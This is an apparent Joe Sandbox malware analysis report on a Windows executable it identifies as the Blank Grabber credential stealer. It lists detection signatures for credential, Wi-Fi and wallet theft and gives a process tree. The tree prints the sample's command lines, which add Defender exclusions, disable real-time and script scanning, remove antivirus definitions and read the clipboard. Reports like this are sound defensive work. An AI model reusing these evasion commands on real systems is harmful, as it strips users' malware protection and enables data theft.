Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Built (1).exe

Overview

General Information

Sample name:Built (1).exe
Analysis ID:1442321
MD5:95567cf5f31a7d7f34ae092e68f9999d
SHA1:5e0d1a179f0a14e9939e8056e46846bc7eadb2bf
SHA256:a879fcea4ce6f6041ffc6271c261cf6fc09ec21ac118db277572ddf7b08e8708
Tags:BlankGrabberexe
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Built (1).exe (PID: 7528 cmdline: "C:\Users\user\Desktop\Built (1).exe" MD5: 95567CF5F31A7D7F34AE092E68F9999D)
    • Built (1).exe (PID: 7544 cmdline: "C:\Users\user\Desktop\Built (1).exe" MD5: 95567CF5F31A7D7F34AE092E68F9999D)
      • cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built (1).exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7680 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built (1).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7604 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7700 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7628 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7764 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8168 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6032 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4192 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8104 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5264 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8128 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7252 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)